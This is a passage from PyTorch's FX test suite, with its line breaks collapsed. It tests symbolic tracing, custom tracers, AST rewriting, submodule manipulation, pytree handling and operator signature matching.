ModWithDictArg(torch.nn.Module): def forward(self, d : Dict[int, torch.Tensor]): return d[42] class CallsModWithDict(torch.nn.Module): def __init__(self): super().__init__() self.m = ModWithDictArg() def forward(self, x): return self.m({42: x}) class MyTracer(torch.fx.Tracer): def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool: return isinstance(m, ModWithDictArg) traced_graph = MyTracer().trace(CallsModWithDict()) def test_trace_dict_proxy_keys(self): class ModWithDictArg(torch.nn.Module): def forward(self, d : Dict[torch.Tensor, torch.Tensor]): return d[42] class CallsModWithDict(torch.nn.Module): def __init__(self): super().__init__() self.m = ModWithDictArg() def forward(self, x): return self.m({x: x}) class MyTracer(torch.fx.Tracer): def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool: return isinstance(m, ModWithDictArg) with self.assertRaisesRegex(RuntimeError, 'cannot contain a Node'): traced_graph = MyTracer().trace(CallsModWithDict()) def test_module_deepcopy_edit_nodes(self): class Foo(torch.nn.Module): def forward(self, x): return torch.relu(x) traced1 = symbolic_trace(Foo()) copied = copy.deepcopy(traced1) for node in copied.graph.nodes: if node.target == torch.relu: node.target = torch.neg copied.recompile() traced1.recompile() x = torch.randn(15, 15) torch.testing.assert_allclose(traced1(x), torch.relu(x)) torch.testing.assert_allclose(copied(x), torch.neg(x)) def test_direct_param_use(self): class TransposeTest(torch.nn.Module): def __init__(self): super().__init__() self.b = torch.nn.Parameter(torch.rand(4, 3)) def forward(self, x): return self.b class Foo(torch.nn.Module): def __init__(self): super().__init__() self.a = TransposeTest() def forward(self, x): return self.a.b, self.a.b.t(), self.a.b.view(12) traced = torch.fx.symbolic_trace(Foo()) assert(all('constant' not in node.target for node in traced.graph.nodes)) def test_single_default_arg(self): class M(torch.nn.Module): def __init__(self): super().__init__() def forward(self, y=1): return y m = M() self.checkGraphModule(m, ()) self.checkGraphModule(m, (3,)) def test_multiple_default_args(self): class M(torch.nn.Module): def __init__(self): super().__init__() def forward(self, y=1, z=2): return y + z m = M() self.checkGraphModule(m, ()) self.checkGraphModule(m, (3,)) self.checkGraphModule(m, (3, 4)) def test_regular_and_default_args(self): class M(torch.nn.Module): def __init__(self): 
super().__init__() def forward(self, x, y=1): return x + y m = M() self.checkGraphModule(m, (2,)) self.checkGraphModule(m, (2, 3)) def test_string_literal_return(self): class M(torch.nn.Module): def __init__(self): super().__init__() def forward(self): return "foo" m = M() self.checkGraphModule(m, ()) def test_namedtuple_return_qualname(self): class NamedTupReturn(torch.nn.Module): def forward(self, x): return MyNamedTup(x, x) traced = symbolic_trace(NamedTupReturn()) input = torch.rand(3, 4) self.assertEqual(traced(input), MyNamedTup(input, input)) def test_update_args_kwargs_yells_at_you(self): symtraced = symbolic_trace(SimpleTest()) node = next(iter(symtraced.graph.nodes)) with self.assertRaisesRegex(AttributeError, '__update_args_kwargs'): node.__update_args_kwargs((), {}) def test_torchbind_class_attribute_in_fx(self): if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS: self.skipTest("torch.classes._TorchScriptTesting._StackString is registered, skipping") class FooBar1234(torch.nn.Module): def __init__(self): super(FooBar1234, self).__init__() self.f = torch.classes._TorchScriptTesting._StackString(["3", "4"]) def forward(self): return self.f.top() m = FooBar1234() self.checkGraphModule(m, ()) def test_torchbind_class_attribute_in_fx_tensor_arg(self): if TEST_WITH_ROCM or IS_FBCODE or IS_WINDOWS or IS_MACOS: self.skipTest("torch.classes._TorchScriptTesting._ReLUClass is registered, skipping") class FooBar2341(torch.nn.Module): def __init__(self): super(FooBar2341, self).__init__() self.f = torch.classes._TorchScriptTesting._ReLUClass() def forward(self, x): return self.f.run(x) m = FooBar2341() traced = symbolic_trace(m) input = torch.randn(3, 4) self.assertEqual(traced(input), m(input)) self.assertTrue(any(n.op == 'call_method' for n in traced.graph.nodes)) def test_script_method_trace(self): class Scripted(torch.nn.Module): def forward(self, x): return torch.relu(x) class Holder(torch.nn.Module): def __init__(self): super().__init__() self.s = torch.jit.script(Scripted()) def forward(self, x): return self.s(x) h = Holder() traced = symbolic_trace(h) input = torch.randn(3, 4) self.assertEqual(traced(input), h(input)) self.assertTrue(any(n.op == 'call_method' for n in traced.graph.nodes)) def test_namedtuple_return_trace(self): class NamedTupReturn(torch.nn.Module): def forward(self, x): return Pair(x, x) traced = symbolic_trace(NamedTupReturn()) input = torch.rand(3, 4) self.assertEqual(traced(input), Pair(input, input)) def test_return_type_exists(self): class ReturnTypeModule(torch.nn.Module): def other(self, x: List[str]) -> List[str]: return x def forward(self, x: List[str]) -> List[str]: return self.other(x) traced = symbolic_trace(ReturnTypeModule()) self.assertIn("-> typing_List[str]", traced._code) scripted = torch.jit.script(traced) self.assertIn("-> List[str]", scripted.code) def getitem_inner(self): class GetItemBase(torch.nn.Module): def __init__(self): super().__init__() self.register_buffer('pe', torch.randn(8, 8)) class GetItem1(GetItemBase): def forward(self, x): return self.pe[:, :x.size(0)] class GetItem2(GetItemBase): def forward(self, x): return self.pe[x.size(0)] class GetItem3(GetItemBase): def forward(self, x): return self.pe[4] # fx creates `self._tensor_constant0` here self.checkGraphModule(GetItem1(), [torch.zeros(4)]) self.checkGraphModule(GetItem2(), [torch.zeros(4)]) self.checkGraphModule(GetItem3(), [torch.zeros(4)]) @unittest.skipUnless(os.environ.get("FX_PATCH_GETITEM") == "1", "Will be checked in test_getitem_subproc") def test_getitem(self): 
self.getitem_inner() def test_getitem_subproc(self): # need to run this test in a subproc to work around: # https://github.com/pytorch/pytorch/issues/50710 proc = Process(target=run_getitem_target) proc.start() proc.join() self.assertEqual(proc.exitcode, 0) def test_user_friendly_call_provenance_with_function(self): def fn(x): return wrapper_fn(x) traced = torch.fx.symbolic_trace(fn) with self.assertRaisesRegex(RuntimeError, "'wrapper_fn' is " "being compiled since it was called" " from 'fn.forward'"): scripted = torch.jit.script(traced) def test_user_friendly_call_provenance_with_module(self): class M(torch.nn.Module): def forward(self, x): return wrapper_fn(x) traced = torch.fx.symbolic_trace(M()) with self.assertRaisesRegex(RuntimeError, "'wrapper_fn' is " "being compiled since it was called" " from 'M.forward'"): scripted = torch.jit.script(traced) def test_snake_case(self): class M(torch.nn.Module): def __init__(self): super(M, self).__init__() self.activations = torch.nn.ModuleDict([ ["snake_case", torch.nn.ReLU()], ["PascalCase", torch.nn.LeakyReLU()], ["ALL_CAPS", torch.nn.PReLU()] ]) def forward(self, x): a = self.activations["snake_case"](x) b = self.activations["PascalCase"](x) c = self.activations["ALL_CAPS"](x) return a, b, c traced = symbolic_trace(M()) check = [ ("activations_snake_case", "activations.snake_case"), ("activations_pascal_case", "activations.PascalCase"), ("activations_all_caps", "activations.ALL_CAPS") ] i = 0 for node in traced.graph.nodes: if node.op == "placeholder" or node.op == "output": continue name = check[i][0] target = check[i][1] self.assertEqual(name, node.name) self.assertEqual(target, node.target) i += 1 self.assertEqual(i, 3) def test_no_mutation(self): from torch.fx.immutable_collections import immutable_list x = immutable_list([3, 4]) with self.assertRaisesRegex(NotImplementedError, "new_args"): x[0] = 4 def test_partial_trace(self): class Foo(torch.nn.Module): def forward(self, x, y): if y: return 2 * x else: return x mod = Foo() mod_true = symbolic_trace(mod, concrete_args={'y': True}) mod_false = symbolic_trace(mod, concrete_args={'y': False}) self.assertEqual(mod_true(3, True), 6) print(mod_true.code) assert(any([i.target == torch._assert for i in mod_true.graph.nodes])) with self.assertRaises(AssertionError): mod_true(3, False) self.assertEqual(mod_false(3, False), 3) with self.assertRaises(AssertionError): mod_false(3, True) def f_higher(a, f): return f(a) nf = symbolic_trace(f_higher, concrete_args={'f': lambda x: x * 2}) self.assertEqual(nf(3, lambda x: x * 2), 6) def test_custom_traceback_raised_when_exception_source_is_graphmodule(self): class M(torch.nn.Module): def __init__(self): super(M, self).__init__() self.W = torch.nn.Parameter(torch.randn(5)) def forward(self, x): return torch.dot(self.W, x) traced = torch.fx.symbolic_trace(M()) out = [n for n in traced.graph.nodes if n.op == "output"][-1] with traced.graph.inserting_before(out): relu_out = traced.graph.call_method(method_name='relu', args=(out.args[0],)) out.args = (relu_out,) traced.recompile() with self.capture_stderr() as captured: with self.assertRaises(TypeError): traced(5) self.assertRegex(captured[0], r"Call using an FX-traced Module, line .* of the " r"traced Module's generated forward function:") def test_custom_traceback_not_raised_when_exception_source_is_submodule(self): class M(torch.nn.Module): def __init__(self): super().__init__() self.linear = torch.nn.Linear(3, 4) def forward(self, x): return self.linear(x) traced = torch.fx.symbolic_trace(M()) # Do not 
change this to `capture_stderr` or another context # manager without ensuring that the output is as expected try: traced(torch.rand(5, 5)) except RuntimeError: captured = traceback.format_exc() self.assertNotRegex(captured, r"Call using an FX-traced Module, line .* of the " r"traced Module's generated forward function:") def test_graph_module_replicate_for_dp(self): class Foo(torch.nn.Module): def forward(self, x): return torch.relu(x) gm = torch.fx.symbolic_trace(Foo()) x = torch.randn(5, 3) out = gm(x) replica = gm._replicate_for_data_parallel() out_replica = replica(x) torch.testing.assert_allclose(out_replica, out) def test_ast_rewriter_rewrites_assert(self): class M(torch.nn.Module): def forward(self, x: torch.Tensor, y: int, z: int): assert y == z return torch.add(x, x) ast_rewriter = RewritingTracer() graph = ast_rewriter.trace(M()) traced = GraphModule(ast_rewriter.root, graph, "gm") traced.graph.lint() def test_ast_rewriter_rewrites_assert_with_message(self): class M(torch.nn.Module): def forward(self, x: torch.Tensor, y: int, z: int): assert y == z, "msg" return torch.add(x, x) ast_rewriter = RewritingTracer() graph = ast_rewriter.trace(M()) traced = GraphModule(ast_rewriter.root, graph, "gm") traced.graph.lint() def test_throw_out_variant(self): def foo(x): y = torch.rand_like(x) torch.sigmoid(x, out=y) return y class MyTracer(torch.fx.Tracer): check_mutable_operations = True tracer = MyTracer() with self.assertRaisesRegex(RuntimeError, 'mutable operation aten::sigmoid.out'): traced_graph = tracer.trace(foo) def test_ast_rewriter_reassigns_submodules(self): class M(torch.nn.Module): def __init__(self): super().__init__() self.bn = torch.nn.BatchNorm2d(100) def forward(self, x: torch.Tensor): return torch.add(x, x) ast_rewriter = RewritingTracer() graph = ast_rewriter.trace(M()) traced = GraphModule(ast_rewriter.root, graph, "gm") traced.graph.lint() def test_ast_rewriter_wrap(self): self.assertEqual(3 + 4 + 5, a_lifted_leaf((3, 4), 5)) def to_trace(y): return ( a_lifted_leaf((4, y), 3) + a_lifted_leaf((3, 4), 5) + a_lifted_leaf((y, y), y) ) ast_rewriter = RewritingTracer() graph = ast_rewriter.trace(to_trace) traced = GraphModule(ast_rewriter.root, graph, "gm") self.assertIn("a_lifted_leaf", traced.code) self.assertEqual(27, traced(2)) self.assertIs(a_lifted_leaf, real_a_lifed_leaf) def test_ast_rewriter_wrap_fn_directly(self): self.assertEqual(3 + 4 + 5, a_lifted_leaf2((3, 4), 5)) def to_trace(y): return ( a_lifted_leaf2((4, y), 3) + a_lifted_leaf2((3, 4), 5) + a_lifted_leaf2((y, y), y) ) ast_rewriter = RewritingTracer() graph = ast_rewriter.trace(to_trace) traced = GraphModule(ast_rewriter.root, graph, "gm") self.assertIn("a_lifted_leaf2", traced.code) self.assertEqual(27, traced(2)) self.assertIs(a_lifted_leaf2, real_a_lifed_leaf2) def test_profiler_ranges_side_effect(self): g = torch.fx.Graph() handle = g.call_function(torch.ops.profiler._record_function_enter, ('test_range',)) g.call_function(torch.ops.profiler._record_function_exit, (handle,)) g.output(None) found_targets = {} for node in g.nodes: if node.op == 'call_function': found_targets.setdefault(node.target) self.assertEqual( found_targets.keys(), [torch.ops.profiler._record_function_enter, torch.ops.profiler._record_function_exit]) g.eliminate_dead_code() found_targets = {} for node in g.nodes: if node.op == 'call_function': found_targets.setdefault(node.target) self.assertEqual( found_targets.keys(), [torch.ops.profiler._record_function_enter, torch.ops.profiler._record_function_exit]) def 
test_ast_rewriter_wrapped_via_decorator(self): class F(torch.nn.Module): def forward(self, x): return wrapped_via_decorator(x) ast_rewriter = RewritingTracer() graph = ast_rewriter.trace(F()) traced = GraphModule(ast_rewriter.root, graph, "gm") self.assertIn("wrapped_via_decorator", traced.code) self.assertEqual(traced(0), 1) self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator) self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched")) def test_ast_rewriter_wrapped_via_decorator_and_transformed(self): self.assertEqual(wrapped_via_decorator(0), 1) def to_trace(y): return wrapped_via_decorator(y) ast_rewriter = RewritingTracer() graph = ast_rewriter.trace(to_trace) traced = GraphModule(ast_rewriter.root, graph, "gm") self.assertIn("wrapped_via_decorator", traced.code) self.assertEqual(traced(0), 1) self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator) self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched")) transformed = torch.fx.Transformer(traced).transform() self.assertIn("wrapped_via_decorator", transformed.code) self.assertEqual(transformed(0), 1) self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator) self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched")) def test_ast_rewriter_wrap_with_submodule(self): class M(torch.nn.Module): def __init__(self): super(M, self).__init__() self.batchnorm1d = torch.nn.BatchNorm1d(2, affine=False) def forward(self, x: torch.Tensor): return wrapped_with_submodule(x, self.batchnorm1d) ast_rewriter = RewritingTracer() graph = ast_rewriter.trace(M()) traced = GraphModule(ast_rewriter.root, graph, "gm") self.assertIn("wrapped_with_submodule", traced.code) input = torch.rand(3, 2) ref_batchnorm1d = torch.nn.BatchNorm1d(2, affine=False) self.assertEqual(ref_batchnorm1d(input), traced(input)) def test_submodule_manipulation_API(self): class C(torch.nn.Module): def __init__(self): super(C, self).__init__() self.conv = torch.nn.Conv2d(16, 33, 3, stride=2) self.param = torch.nn.Parameter(torch.rand(2, 3)) def forward(self, x): return self.conv(torch.cat([self.param, x])) class B(torch.nn.Module): def __init__(self): super(B, self).__init__() self.linear = torch.nn.Linear(100, 200) self.register_buffer("buf", torch.randn(2, 3)) self.net_c = C() def forward(self, x): return self.linear(torch.cat([self.buf, self.net_c(x)])) class A(torch.nn.Module): def __init__(self): super(A, self).__init__() self.net_b = B() self.param = torch.nn.Parameter(torch.rand(2, 3)) def forward(self, x): return self.net_b(x) + self.param a = symbolic_trace(A()) a.add_submodule("net_b.net_c.dropout", torch.nn.Dropout(p=0.2)) conv = [n for n in a.graph.nodes if n.target == "net_b.net_c.conv"][-1] with a.graph.inserting_before(conv): with warnings.catch_warnings(record=True) as w: dropout = a.graph.call_module(module_name="net_b.net_c.dropout", args=conv.args) self.assertEqual(len(w), 0) conv.replace_all_uses_with(dropout) a.graph.erase_node(conv) a.recompile() def module_exists(gm: GraphModule, path: str) -> bool: return any(path == name for name, _ in gm.named_modules()) def parameter_exists(gm: GraphModule, path: str) -> bool: return (any(path == name for name, _ in gm.named_parameters()) and any(path == name for name in gm.state_dict().keys())) def buffer_exists(gm: GraphModule, path: str) -> bool: return (any(path == name for name, _ in gm.named_buffers()) and any(path == name for name in gm.state_dict().keys())) # Test that we added the "dropout" submodule self.assertTrue(module_exists(a, 
"net_b.net_c.dropout")) # Test `get_submodule` with an added submodule self.assertIsNotNone(a.get_submodule("net_b.net_c.dropout")) # Test that the "conv" submodule is still there self.assertTrue(module_exists(a, "net_b.net_c.conv")) # Test `get_submodule` with an original module self.assertIsNotNone(a.get_submodule("net_b.net_c.conv")) # Test that the "conv" node is NOT still there conv = [n for n in a.graph.nodes if n.target == "net_b.net_c.conv"] self.assertEqual(conv, []) a.delete_submodule("net_b.net_c.conv") # Test that the "conv" submodule is now gone self.assertFalse(module_exists(a, "net_b.net_c.conv")) # Test `get_submodule` with a deleted submodule with self.assertRaisesRegex(AttributeError, "has no attribute " "`conv`"): self.assertIsNone(a.get_submodule("net_b.net_c.conv")) # Test `get_attr` warnings cat = [n for n in a.graph.nodes if n.target == torch.cat][-1] with a.graph.inserting_before(cat): with warnings.catch_warnings(record=True) as w: param = a.graph.get_attr(qualified_name="net_b.net_c.param") self.assertEqual(len(w), 0) with self.assertWarnsRegex(UserWarning, "Attempted to " "insert a get_attr Node with no " "underlying reference in the " "owning GraphModule"): bad_param = a.graph.get_attr(qualified_name="net_b.param") a.graph.erase_node(bad_param) cat.args = (*cat.args, param) a.recompile() a.graph.lint() # Test `get_parameter` a.get_parameter("net_b.net_c.param") with self.assertRaisesRegex(AttributeError, "is not an " "nn.Parameter"): a.get_parameter("net_b.buf") with self.assertRaisesRegex(AttributeError, "has no attribute " "`param`"): a.get_parameter("net_b.param") # Test `get_buffer` a.get_buffer("net_b.buf") with self.assertRaisesRegex(AttributeError, "is not a " "buffer"): a.get_buffer("net_b.net_c.param") with self.assertRaisesRegex(AttributeError, "has no attribute " "`buf`"): a.get_buffer("net_b.net_c.buf") # Test non-nested attributes a.get_submodule("") a.get_parameter("param") # Insert some unused submodules a.add_submodule("net_b.embedding", torch.nn.Embedding(10, 3)) a.add_submodule("net_b.net_c.embedding", torch.nn.Embedding(10, 3)) a.add_submodule("net_b.net_c.rnn", torch.nn.RNN(10, 20, 2)) a.add_submodule("batch_norm_2d", torch.nn.BatchNorm2d(100)) # Garbage collection a.delete_all_unused_submodules() # Test that all the unused submodules are gone self.assertFalse(module_exists(a, "net_b.embedding")) self.assertFalse(module_exists(a, "net_b.net_c.embedding")) self.assertFalse(module_exists(a, "net_b.net_c.rnn")) self.assertFalse(module_exists(a, "batch_norm_2d")) # Test that we didn't delete any unused Parameters or buffers self.assertTrue(parameter_exists(a, "net_b.net_c.param")) self.assertTrue(buffer_exists(a, "net_b.buf")) a.graph.lint() def test_delete_unused_submodules_leaf(self): class SubModule(torch.nn.Module): def __init__(self): super().__init__() self.linear = torch.nn.Linear(10, 10) self.relu = torch.nn.ReLU() def forward(self, x): x = self.linear(x) x = self.relu(x) return x class Model(torch.nn.Module): def __init__(self): super().__init__() self.submod = SubModule() def forward(self, x): x = self.submod(x) return x model = Model() class MyCustomTracer(torch.fx.Tracer): def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool: return module_qualified_name == "submod" inputs = torch.randn(1, 10) traced_graph = MyCustomTracer().trace(model) gm2 = torch.fx.GraphModule(model, traced_graph) gm2.delete_all_unused_submodules() torch.testing.assert_allclose(gm2(inputs), model(inputs)) def 
test_tracing_graphmodules_as_leaf_submodules(self): class A(torch.nn.Module): def forward(self, t): return t + t class B(torch.nn.Module): def __init__(self): super(type(self), self).__init__() self.calling = False self.called = False def forward(self, t): if self.calling: return t - t else: return t + t def __call__(self, *args): self.called = True self.calling = True return super(type(self), self).__call__(*args) self.calling = False class M(torch.nn.Module): def __init__(self, a, b): super().__init__() self.a = a self.b = b def forward(self, t): x = self.a(t) y = self.b(t) return x + y class LeafTracer(Tracer): def is_leaf_module(self, module, name): return True class LeafTracerNotB(Tracer): def is_leaf_module(self, module, name): return False if "b" in name else True # Recompile calls added "for fun", since they # chain __call__ wrappers. # # Test: B as a regular, non-leaf module # a = symbolic_trace(A()) a.recompile() m = M(a, B()) graph = LeafTracerNotB().trace(m) gm = GraphModule(m, graph) gm.recompile() # Test graphmodule/submodule a is not inlined. self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule)) match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"] self.assertTrue(len(match) == 1) # Test submodule b is not treated as leaf. self.assertFalse(hasattr(gm, "b")) # Test assert custom __call__ on submodule b was honored. match = [ n for n in gm.graph.nodes if n.op == "call_function" and n.target == operator.sub ] self.assertTrue(len(match) == 1) # # Test: B as a regular, leaf module # symbolic_trace should only patch torch.nn.Module.__call__, # which means B.__call__ should still execute # a = symbolic_trace(A()) a.recompile() b = B() m = M(a, b) graph = LeafTracer().trace(m) gm = GraphModule(m, graph) gm.recompile() # Test graphmodule/submodule a is not inlined. self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule)) match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"] self.assertTrue(len(match) == 1) # Test submodule b is leaf: self.assertTrue(isinstance(gm.get_submodule("b"), torch.nn.Module)) match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "b"] self.assertTrue(len(match) == 1) # Test b.__call__ was run self.assertTrue(b.called) self.assertTrue(gm.get_submodule("b").called) # # Test: B as GraphModule leaf # __call__ not honored since symbolic_trace directly invokes forward() # a = symbolic_trace(A()) a.recompile() b = symbolic_trace(B()) b.recompile() m = M(a, b) graph = LeafTracer().trace(m) gm = GraphModule(m, graph) gm.recompile() self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule)) match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"] self.assertTrue(len(match) == 1) self.assertTrue(isinstance(gm.get_submodule("b"), torch.nn.Module)) match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "b"] self.assertTrue(len(match) == 1) def _test_graph_module_init_buffer_param_copied(self, use_dict_init: bool): class MyModule(torch.nn.Module): def __init__(self): super().__init__() self.register_buffer("my_buff", torch.rand(3, 4)) self.register_parameter( "my_param", torch.nn.Parameter(torch.rand(3, 4)) ) def forward(self, x): return x + self.my_buff + self.my_param mod = MyModule() mod_traced = symbolic_trace(mod) # Create new GraphModule based on original, either w/ dict or root module. 
orig_buff = mod_traced.get_buffer("my_buff") orig_param = mod_traced.get_parameter("my_param") mod_traced_new = GraphModule( {"my_buff": orig_buff, "my_param": orig_param} if use_dict_init else mod, mod_traced.graph, ) # Check that both my_buff and my_param are found and the same. try: new_buff = mod_traced_new.get_buffer("my_buff") except Exception: self.fail("Did not find my_buff") self.assertEqual(orig_buff, new_buff) try: new_param = mod_traced_new.get_parameter("my_param") except Exception: self.fail("Did not find my_param") self.assertEqual(orig_param, new_param) x = torch.rand(3, 4) orig_out = mod_traced(x) submodules_out = mod_traced_new(x) self.assertEqual(orig_out, submodules_out) def test_graph_module_init_buffer_param_copied_dict_init(self): self._test_graph_module_init_buffer_param_copied(use_dict_init=True) def test_graph_module_init_buffer_param_copied_mod_init(self): self._test_graph_module_init_buffer_param_copied(use_dict_init=False) def test_annotations_with_no_forward_references(self): class A: def __call__(self, x: torch.Tensor): return torch.add(x, x) class M(torch.nn.Module): def forward(self, x: torch.Tensor, a: A) -> torch.Tensor: return a(x) self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None) def test_annotations_with_forward_references(self): class A: def __call__(self, x: torch.Tensor): return torch.add(x, x) class M(torch.nn.Module): def forward(self, x: 'torch.Tensor', a: 'A') -> 'torch.Tensor': return a(x) self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None) def test_annotations_with_non_torch_reference_and_no_internal_forward_references(self): class A: def __call__(self, x: torch.Tensor): return torch.add(x, x) class M(torch.nn.Module): def forward(self, x: List[torch.Tensor], a: A) -> torch.Tensor: return a(x[0]) self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None) def test_annotations_with_non_torch_reference_and_internal_forward_references(self): class A: def __call__(self, x: torch.Tensor): return torch.add(x, x) class M(torch.nn.Module): def forward(self, x: List['torch.Tensor'], a: A) -> 'torch.Tensor': return a(x)[0] self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None) @unittest.skipIf(sys.version_info < (3, 7), "`__future__` feature " "`annotations` is not defined in Python <3.7") def test_annotation_with_future(self): try: import fx.test_future # noqa: F401 finally: del sys.modules["__future__"] def test_annotations_empty_tuple(self): class Foo(torch.nn.Module): def forward(self, x: Tuple[()], y: Tuple[str, Tuple[()]]): return "foo" traced = torch.fx.symbolic_trace(Foo()) x = () y = ("bar", ()) traced(x, y) FileCheck().check("_Tuple[()]") \ .check("typing_Tuple[str,typing_Tuple[()]]") \ .run(traced.code) scripted = torch.jit.script(traced) scripted(x, y) FileCheck().check("Tuple[()]") \ .check("Tuple[str, Tuple[()]]") \ .run(scripted.code) def test_pytree(self): def f_sum(x): return sum(x) def f_sum_dict(x): out = 0 for k, v in x.items(): out += v return out def f_dict_list_map(x): new_dict = {} for k, v in x.items(): new_dict[k] = [i + 1 for i in v] return new_dict def f_dict_add(x): return x['a'] + sum(x['z']) def f_namedtuple_add(x): return x.x + x.y pytree._register_pytree_node( Foo, lambda x: ([x.a, x.b], None), lambda x, _: Foo(x[0], x[1]), ) fx_pytree.register_pytree_flatten_spec(Foo, lambda x, _: [x.a, x.b]) def f_custom(x): return x.a + x.b def f_custom_dict(x): return f_sum_dict(x.a) + x.b def f_return_custom(x): return Foo(x.b, x.a) tests = [ (f_sum, [PH, PH, PH]), (f_sum, []), (f_sum_dict, 
{'a': PH, 'b': PH, 'c': PH}), (f_dict_list_map, {'a': (PH, PH), 'b': [PH], 'c': []}), (f_dict_list_map, {5: (PH, PH, PH)}), (f_dict_add, {'a': PH, 'z': (PH, PH, PH)}), (f_dict_add, {'a': PH, 'z': []}), (f_custom, Foo(PH, PH)), (f_custom, Foo(PH, 3)), (f_custom_dict, Foo({'a': PH, 'b': PH}, PH)), # (f_return_custom, Foo(PH, PH)), # Don't currently support output pytrees (f_namedtuple_add, Point(PH, PH)), ] def verify_pytree(f, inp): val = pytree.tree_map(lambda x: torch.randn(3) if x == PH else x, inp) num_flat_args = len([i == PH for i in pytree.tree_flatten(inp)[0]]) orig_out = f(val) nf = symbolic_trace(f, concrete_args={'x': inp}) self.assertEqual(nf(val), orig_out) assert num_flat_args == 0 or "tree_flatten_spec" in nf.code assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == num_flat_args) nf = symbolic_trace(nf) self.assertEqual(nf(val), orig_out) assert "tree_flatten_spec" not in nf.code assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == 1) nf = symbolic_trace(nf, concrete_args={'x': inp}) self.assertEqual(nf(val), orig_out) assert num_flat_args == 0 or "tree_flatten_spec" in nf.code assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == num_flat_args) pickled = pickle.dumps(nf) nf = pickle.loads(pickled) self.assertEqual(nf(val), orig_out) for f, inp in tests: verify_pytree(f, inp) def test_pytree_concrete(self): def f(b, a): if b: return a['a'] else: return a['z'] inp = {'a': {'a': PH, 'z': PH}, 'b': True} nf = symbolic_trace(f, concrete_args=inp) val = pytree.tree_map(lambda x: torch.randn(3) if x == PH else x, inp) self.assertEqual(nf(**val), f(**val)) nf = symbolic_trace(nf) self.assertEqual(nf(**val), f(**val)) def run_getitem_target(): from torch.fx._symbolic_trace import _wrapped_methods_to_patch _wrapped_methods_to_patch.append((torch.Tensor, "__getitem__")) try: TestFX().getitem_inner() finally: _wrapped_methods_to_patch.pop() class TestOperatorSignatures(JitTestCase): def setUp(self): # Checking for mutable operations whil tracing is feature flagged # Enable it in testing but not by default self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations torch.fx.proxy.TracerBase.check_mutable_operations = True def tearDown(self): torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag @onlyCPU @ops(op_db, allowed_dtypes=(torch.float,)) def test_get_torch_func_signature_exhaustive(self, device, dtype, op): if not isinstance(op.op, types.BuiltinFunctionType): raise unittest.SkipTest("This path doesn't work on Python functions") sample_inputs_itr = op.sample_inputs(device, dtype, requires_grad=False) schemas = get_signature_for_torch_op(op.op) if not schemas: raise RuntimeError('No Schemas Returned') for sample_input in sample_inputs_itr: # Iterate through overloads until we hit a match. 
If we exit this # loop via `else`, we haven't found a match for schema in schemas: try: bound_args = schema.bind(sample_input.input, *sample_input.args, **sample_input.kwargs) bound_args.apply_defaults() op(*bound_args.args, **bound_args.kwargs) break except TypeError as e: pass else: raise RuntimeError(f'Did not match any schemas for op {op.name}!') class TestFXAPIBackwardCompatibility(JitTestCase): def setUp(self): self.maxDiff = None # Checking for mutable operations whil tracing is feature flagged # Enable it in testing but not by default self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations torch.fx.proxy.TracerBase.check_mutable_operations = True def tearDown(self): torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag def _fn_to_stable_annotation_str(self, obj): """ Unfortunately we have to serialize function signatures manually since serialization for `inspect.Signature` objects is not stable across python versions """ fn_name = torch.typename(obj) signature = inspect.signature(obj) sig_str = f'{fn_name}{signature}' arg_strs = [] for k, v in signature.parameters.items(): maybe_type_annotation = f': {self._annotation_type_to_stable_str(v.annotation, sig_str)}'\ if v.annotation is not inspect.Signature.empty else '' def default_val_str(val): if isinstance(val, (tuple, list)): str_pieces = ['(' if isinstance(val, tuple) else '['] str_pieces.append(', '.join(default_val_str(v) for v in val)) if isinstance(val, tuple) and len(str_pieces) == 2: str_pieces.append(',') str_pieces.append(')' if isinstance(val, tuple) else ']') return ''.join(str_pieces) # Need to fix up some default value strings. # First case: modules. Default module `repr` contains the FS path of the module. # Don't leak that if isinstance(val, types.ModuleType): return f'<module {val.__name__}>' # Second case: callables. Callables (such as lambdas) encode their address in # their string repr. 
Don't do that if callable(val): return f'<function {val.__name__}>' return str(val) if v.default is not inspect.Signature.empty: default_val_str = default_val_str(v.default) if not isinstance(v.default, str) else f"'{v.default}'" maybe_default = f' = {default_val_str}' else: maybe_default = '' maybe_stars = '' if v.kind == inspect.Parameter.VAR_POSITIONAL: maybe_stars = '*' elif v.kind == inspect.Parameter.VAR_KEYWORD: maybe_stars = '**' arg_strs.append(f'{maybe_stars}{k}{maybe_type_annotation}{maybe_default}') return_annot = f' -> {self._annotation_type_to_stable_str(signature.return_annotation, sig_str)}'\ if signature.return_annotation is not inspect.Signature.empty else '' return f'{fn_name}({", ".join(arg_strs)}){return_annot}' def _annotation_type_to_stable_str(self, t, sig_str): if t is inspect.Signature.empty: return '' # Forward ref if isinstance(t, str): return f"'{t}'" if hasattr(typing, 'ForwardRef') and isinstance(t, typing.ForwardRef): return t.__forward_arg__ if hasattr(typing, '_ForwardRef') and isinstance(t, typing._ForwardRef): return t.__forward_arg__ 